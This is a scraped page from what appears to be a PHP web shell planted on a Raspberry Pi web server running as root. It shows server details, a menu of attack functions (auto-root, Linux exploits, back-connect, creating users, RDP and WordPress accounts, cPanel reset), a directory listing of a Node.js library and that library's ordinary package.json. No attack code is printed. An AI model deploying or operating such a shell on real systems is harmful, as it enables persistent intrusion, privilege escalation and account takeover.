Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
nodejs /
libnpx /
[ HOME SHELL ]
Name
Size
Permission
Action
locales
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
auto-fallback.js
1.51
KB
-rw-r--r--
child.js
2.2
KB
-rw-r--r--
get-prefix.js
1.23
KB
-rw-r--r--
index.js
12.62
KB
-rw-r--r--
libnpx.1
6.71
KB
-rw-r--r--
package.json
2.02
KB
-rw-r--r--
parse-args.js
7.1
KB
-rw-r--r--
util.js
390
B
-rw-r--r--
y.js
490
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "libnpx", "version": "10.2.0", "description": "support library for npx -- an tool for executing npm-based packages.", "main": "index.js", "man": "./libnpx.1", "files": [ "*.js", "libnpx.1", "locales" ], "scripts": { "bin": "make bin", "publish-bin": "npm run bin && cd bin && npm publish", "docs": "tail -n +2 README.md | marked-man --manual 'User Commands' --version \"$npm_package_name@$npm_package_version\" > $npm_package_name.1", "prerelease": "npm t && npm run docs", "postrelease": "npm publish && git push --follow-tags", "pretest": "standard *.js test bin/*.js locales", "release": "standard-version -s", "test": "cross-env NPX_UPDATE_LOCALE_FILES=true LC_ALL=en nyc --all -- tap -J test/*.js", "update-coc": "weallbehave -o . && git add CODE_OF_CONDUCT.md && git commit -m 'docs(coc): updated CODE_OF_CONDUCT.md'", "update-contrib": "weallcontribute -o . && git add CONTRIBUTING.md && git commit -m 'docs(contributing): updated CONTRIBUTING.md'" }, "repository": "https://github.com/zkat/npx", "keywords": [ "npm", "npm exec", "shell", "scripts", "npm bin", "cli" ], "author": { "name": "Kat Marchán", "email": "kzm@sykosomatic.org", "twitter": "maybekatz" }, "license": "ISC", "dependencies": { "dotenv": "^5.0.1", "npm-package-arg": "^6.0.0", "rimraf": "^2.6.2", "safe-buffer": "^5.1.0", "update-notifier": "^2.3.0", "which": "^1.3.0", "y18n": "^4.0.0", "yargs": "^11.0.0" }, "devDependencies": { "cross-env": "^5.1.3", "json": "^9.0.6", "marked-man": "^0.2.1", "mkdirp": "^0.5.1", "npm": "^5.7.1", "nyc": "^11.4.1", "require-inject": "^1.4.0", "standard": "^11.0.0", "standard-version": "^4.3.0", "tacks": "^1.2.6", "tap": "^11.1.2", "weallbehave": "^1.2.0", "weallcontribute": "^1.0.8" }, "config": { "nyc": { "exclude": [ "node_modules/**", "test/**" ] } }, "engines": { "node": ">=4" } }
Close